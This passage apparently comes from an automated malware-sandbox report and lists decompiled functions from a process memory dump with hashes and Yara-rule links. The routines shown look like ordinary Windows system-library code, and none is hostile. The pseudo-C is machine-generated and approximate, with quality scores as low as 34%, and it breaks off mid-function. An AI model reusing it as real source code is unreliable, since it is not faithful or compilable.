                                      • Instruction Fuzzy Hash: 4F214876051A40EFC725EF68CA04F29B7F9FF08704F14456CE0498B6A2DB38E951DB48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03754257, Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 90%
                                      			E03754257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x37a08d0);
				E0371D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E037541E8(__ebx, __edi, __ecx, _t39);
				E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x37b87e4;
					_t18 =  *0x37b87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x37b5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x37b87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x37b87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L036C7055(_t31 + 0xfffffff8);
								_t24 =  *0x37b87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x37b87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x37b5cd0;
				if( *0x37b5cd0 <= 0) {
					L036C7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x37b87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x37b87e8 = _t30;
						 *0x37b87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0371D0D1(L03754320());
			}















                                      0x03754257
                                      0x03754257
                                      0x03754257
                                      0x03754259
                                      0x0375425e
                                      0x03754263
                                      0x03754265
                                      0x03754273
                                      0x03754278
                                      0x0375427c
                                      0x0375427f
                                      0x03754281
                                      0x03754287
                                      0x037542d7
                                      0x037542d7
                                      0x037542da
                                      0x0375428d
                                      0x0375428d
                                      0x0375428f
                                      0x03754292
                                      0x03754297
                                      0x0375429c
                                      0x037542a0
                                      0x037542a6
                                      0x037542a8
                                      0x037542ae
                                      0x037542b3
                                      0x00000000
                                      0x037542ba
                                      0x037542ba
                                      0x037542bf
                                      0x037542c5
                                      0x037542ca
                                      0x037542cf
                                      0x037542d0
                                      0x00000000
                                      0x037542d0
                                      0x037542b3
                                      0x00000000
                                      0x037542a6
                                      0x0375429c
                                      0x037542dc
                                      0x037542dc
                                      0x037542e3
                                      0x03754309
                                      0x037542e5
                                      0x037542e5
                                      0x037542e8
                                      0x037542ee
                                      0x037542f0
                                      0x00000000
                                      0x037542f2
                                      0x037542f2
                                      0x037542f4
                                      0x037542f7
                                      0x037542f9
                                      0x03754300
                                      0x03754300
                                      0x037542f0
                                      0x0375430e
                                      0x0375431f

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8da24ddb48f0b38c5c0f96639df79d11995eed7fe8c967bd34997f59ab8feb3e
                                      • Instruction ID: 4793a020b219506b4f6d32e83aae8efe6f2636fb21d0f86f2d577230c72374f3
                                      • Opcode Fuzzy Hash: 8da24ddb48f0b38c5c0f96639df79d11995eed7fe8c967bd34997f59ab8feb3e
                                      • Instruction Fuzzy Hash: C221BB71500750DFCB58EFA9D000A14BBF9FB85319B24C2AEE5098F294EB79C482CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F2397, Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 34%
                                      			E036F2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x37b848c != 0) {
					L036EFAD0(0x37b8610);
					if( *0x37b848c == 0) {
						E036EFA00(0x37b8610, _t19, _t27, 0x37b8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E036F2581(0x37b8610, 0x36a50a0, _t26, _t27, _t28);
						E036EFA00(0x37b8610, 0x36a50a0, _t27, 0x37b8610);
					}
				} else {
					L1:
					_t11 =  *0x37b8614; // 0x0
					if(_t11 == 0) {
						_t11 = E03704886(0x36a1088, 1, 0x37b8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E036F2581(0x37b8610, (_t11 << 4) + 0x36a5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                      0x036f23b0
                                      0x036f23b6
                                      0x036f2409
                                      0x036f2415
                                      0x03735ae9
                                      0x00000000
                                      0x036f241b
                                      0x036f241b
                                      0x036f241d
                                      0x036f2427
                                      0x036f242e
                                      0x036f2430
                                      0x036f2430
                                      0x036f23b8
                                      0x036f23b8
                                      0x036f23b8
                                      0x036f23bf
                                      0x036f23fc
                                      0x036f23fc
                                      0x036f23c1
                                      0x036f23c3
                                      0x036f23d0
                                      0x036f23d8
                                      0x036f23d8
                                      0x036f23dc
                                      0x036f23de
                                      0x036f23e1
                                      0x036f23e1
                                      0x036f23ec

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4ee00f889814f0432479d36ea7a820420c12681a4fb532e328df235bcac707ec
                                      • Instruction ID: 5be483f06cc30d39170c45a65fe0d7dd84484c3a07134ce8190730567bf6ae6b
                                      • Opcode Fuzzy Hash: 4ee00f889814f0432479d36ea7a820420c12681a4fb532e328df235bcac707ec
                                      • Instruction Fuzzy Hash: C9112B76604744AFD720EA2D9C94F16B7EDEB90610F18882AF7029F281D6B4DC05DF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037446A7, Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E037446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0370F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E036FD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L036E77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                      0x037446b7
                                      0x037446ba
                                      0x037446c5
                                      0x037446c8
                                      0x037446d0
                                      0x037446d4
                                      0x037446e6
                                      0x037446e9
                                      0x037446f4
                                      0x037446ff
                                      0x03744705
                                      0x03744706
                                      0x0374470c
                                      0x03744713
                                      0x0374471b
                                      0x03744723
                                      0x03744725
                                      0x037446d6
                                      0x037446d9
                                      0x037446db
                                      0x037446db
                                      0x03744732

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                      • Instruction ID: 44d4fe312183ae72f26fd55302bfdf16e3d40270dfda657b726fbb0408c0e96c
                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                      • Instruction Fuzzy Hash: 9C110276504208BBCB05DF6DD8809BEB7B9EF85300F1080AEF9448B350DA319D55D3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037037F5, Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E037037F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E036E2280(_t6, 0x37b8550);
				}
				_t29 = E0370387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E036DFFB0(0x37b8550, _t27, 0x37b8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                      0x037037fa
                                      0x037037fc
                                      0x03703805
                                      0x03703808
                                      0x03703808
                                      0x03703814
                                      0x03703818
                                      0x03703846
                                      0x03703848
                                      0x0370384b
                                      0x0370384b
                                      0x03703852
                                      0x00000000
                                      0x03703854
                                      0x03703856
                                      0x00000000
                                      0x00000000
                                      0x03703863
                                      0x00000000
                                      0x03703863
                                      0x0370381a
                                      0x0370381a
                                      0x0370381f
                                      0x0370386e
                                      0x0370386e
                                      0x03703871
                                      0x03703873
                                      0x03703873
                                      0x03703868
                                      0x00000000
                                      0x03703868
                                      0x03703821
                                      0x03703826
                                      0x00000000
                                      0x00000000
                                      0x03703828
                                      0x0370382a
                                      0x03703841
                                      0x00000000
                                      0x03703841

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f94986930841b839371992cdcb16df0e674db98ff4792b22f99a3249043980f5
                                      • Instruction ID: 2919affd1d40dd1e34d60726f30a27c17437fd544758ebf1aa6710ff3102e924
                                      • Opcode Fuzzy Hash: f94986930841b839371992cdcb16df0e674db98ff4792b22f99a3249043980f5
                                      • Instruction Fuzzy Hash: 1601D67A901610DBE33BDB199980E26BBFADF85B5171940EDE8458F2D0D730C801D7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CC962, Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 42%
                                      			E036CC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x37bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E036DEEF0(0x37b70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0374F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E036DEB70(_t29, 0x37b70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0370B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0374F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x37b70c0; // 0x0
					while(_t38 != 0x37b70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x37bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                      0x036cc96a
                                      0x036cc974
                                      0x036cc988
                                      0x036cc98a
                                      0x03737c9d
                                      0x03737c9f
                                      0x03737ca4
                                      0x03737cae
                                      0x03737cf0
                                      0x03737cf5
                                      0x03737cfa
                                      0x036cc992
                                      0x036cc996
                                      0x036cc997
                                      0x036cc998
                                      0x036cc9a3
                                      0x036cc9a3
                                      0x03737cb0
                                      0x03737cb7
                                      0x03737cbb
                                      0x00000000
                                      0x00000000
                                      0x03737cbd
                                      0x03737ce8
                                      0x03737cc5
                                      0x03737cc8
                                      0x03737cca
                                      0x03737cd0
                                      0x03737cd6
                                      0x03737cde
                                      0x03737ce4
                                      0x03737ce4
                                      0x03737cd0
                                      0x00000000
                                      0x03737ce8
                                      0x036cc990
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b599cec7be351785033940ffecd78a11fbcd5f8918073d34de3339f53269724e
                                      • Instruction ID: 688978db4522c643c3d2cd0875b3ee811d615f531320a80be13cebd1199fce22
                                      • Opcode Fuzzy Hash: b599cec7be351785033940ffecd78a11fbcd5f8918073d34de3339f53269724e
                                      • Instruction Fuzzy Hash: 2911E17170078A9FC718EF28DC85A6BB7F9FF89610B040539E9458B652EB20EC10D7D1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F002D, Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036F002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E036E7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E036E7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E036E7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E036E7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                      0x036f0032
                                      0x036f0037
                                      0x036f0043
                                      0x03734b3a
                                      0x036f0049
                                      0x036f0049
                                      0x036f0049
                                      0x036f004e
                                      0x036f0053
                                      0x03734b48
                                      0x03734b5a
                                      0x03734b4a
                                      0x03734b53
                                      0x03734b53
                                      0x03734b5f
                                      0x00000000
                                      0x03734b61
                                      0x00000000
                                      0x03734b61
                                      0x036f0059
                                      0x036f0059
                                      0x036f0060
                                      0x03734b6f
                                      0x03734b6f
                                      0x036f0069
                                      0x03734b83
                                      0x00000000
                                      0x00000000
                                      0x03734b90
                                      0x03734b9b
                                      0x03734b9b
                                      0x03734ba4
                                      0x00000000
                                      0x00000000
                                      0x03734baa
                                      0x00000000
                                      0x036f006f
                                      0x036f006f
                                      0x00000000
                                      0x036f006f
                                      0x036f0069

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                      • Instruction ID: 4ea304390a56ecf9627362ef7096436be57fc221678a2e458731093a814505a2
                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                      • Instruction Fuzzy Hash: A4110036202680CFD726CB6AD944B3577D8EF42754F0D00E0DE048BBA3E338C882CA64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036D766D, Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E036D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E036FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E036FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L036E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                      0x036d7672
                                      0x036d767f
                                      0x036d7689
                                      0x036d76de
                                      0x036d76de
                                      0x036d768b
                                      0x036d7691
                                      0x036d7693
                                      0x036d7697
                                      0x00000000
                                      0x036d7699
                                      0x036d76a8
                                      0x00000000
                                      0x036d76aa
                                      0x036d76ad
                                      0x036d76b1
                                      0x00000000
                                      0x036d76b3
                                      0x036d76b3
                                      0x036d76b5
                                      0x036d76ba
                                      0x036d76bc
                                      0x036d76bc
                                      0x036d76c0
                                      0x00000000
                                      0x036d76c2
                                      0x036d76ce
                                      0x036d76ce
                                      0x036d76c0
                                      0x036d76b1
                                      0x036d76a8
                                      0x036d7697
                                      0x036d76d9

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                      • Instruction ID: 771b39209471d8ab319052c81cf50cf3386587a57fc2712596136efd2566b46c
                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                      • Instruction Fuzzy Hash: 38018832B00159AFC720DE5ECD41E5BB7ADEBC4A60B240528B908CF250EA30DD1187A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0375C450, Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 46%
                                      			E0375C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03709910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E037095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E037095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E037095D0();
				return L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                      0x0375c458
                                      0x0375c45d
                                      0x0375c466
                                      0x0375c468
                                      0x0375c469
                                      0x0375c46a
                                      0x0375c46b
                                      0x0375c46e
                                      0x0375c46f
                                      0x0375c471
                                      0x0375c476
                                      0x0375c476
                                      0x0375c47c
                                      0x0375c47e
                                      0x0375c480
                                      0x0375c480
                                      0x0375c483
                                      0x0375c484
                                      0x0375c486
                                      0x0375c488
                                      0x0375c48f
                                      0x0375c491
                                      0x0375c493
                                      0x0375c493
                                      0x0375c48f
                                      0x0375c498
                                      0x0375c49e
                                      0x0375c4ad
                                      0x0375c4ad
                                      0x0375c4b2
                                      0x0375c4b4
                                      0x0375c4cd

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                      • Instruction ID: 8d07b616b71a55c77caf4b4793a42d3592106e21e520999609a3471ad8bc0ae3
                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                      • Instruction Fuzzy Hash: 7401CC76140606FFDA26EF65CC84E62FBADFB45391F144129F2144A5A0CB22ACA0CAA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036C9080, Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 69%
                                      			E036C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x37b85ec;
				E036E2280(_t48, 0x37b85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E036DFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x37b538c; // 0x77f06888
					if( *_t84 != 0x37b5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x379f6e8);
						E0371D0E8(0x37b85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E037988F5(_t80, _t85, 0x37b5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x37b86c0; // 0x2e807b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x37b86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E036E2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E037988F5(0x37b85ec, _t85, 0x37b5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0370AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x37bb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x37b84c0;
																			if(_t82 >=  *0x37b84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03799063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
